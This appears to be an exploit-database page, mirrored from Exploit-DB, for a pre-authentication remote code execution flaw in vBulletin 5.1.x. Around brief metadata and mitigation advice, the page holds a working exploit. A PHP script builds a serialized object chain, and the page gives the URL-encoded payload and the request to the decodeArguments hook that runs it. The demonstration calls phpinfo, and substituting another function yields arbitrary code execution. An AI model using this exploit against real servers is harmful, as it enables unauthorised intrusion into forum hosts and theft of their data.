header-logo
Suggest Exploit
vendor:
Vbulletin
by:
hhjj
9,8
CVSS
HIGH
Unserialize
502
CWE
Product Name: Vbulletin
Affected Version From: 5.1.x
Affected Version To: 5.1.x
Patch Exists: Yes
Related CWE: N/A
CPE: a:vbulletin:vbulletin
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Debian
2015

Vbulletin 5.1.X unserialize 0day preauth RCE exploit

This exploit is a 0day preauth RCE exploit for Vbulletin 5.1.X. It was leaked from the IoT and allows an attacker to execute arbitrary code on the vulnerable system. The exploit works by building an object with a malicious function and then encoding it with urlencode and serialize. The encoded object is then passed to the decodeArguments API hook, which will unserialize the object and execute the malicious function.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of Vbulletin.
Source

Exploit-DB raw data:

# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit
# Date: Nov 4th, 2015
# Exploit Author: hhjj
# Vendor Homepage: http://www.vbulletin.com/
# Version: 5.1.x
# Tested on: Debian
# CVE : 
# I did not discover this exploit, leaked from the IoT.

# Build the object
php << 'eof'
<?php
class vB_Database {
       public $functions = array();

       public function __construct() 
       {
               $this->functions['free_result'] = 'phpinfo';
       }
}

class vB_dB_Result {
       protected $db;
       protected $recordset;

       public function __construct()
       {
               $this->db = new vB_Database();
               $this->recordset = 1;
       }
}

print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

#Then hit decodeArguments with your payload :
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D

Navigation

Suggest Exploit

Services By CQR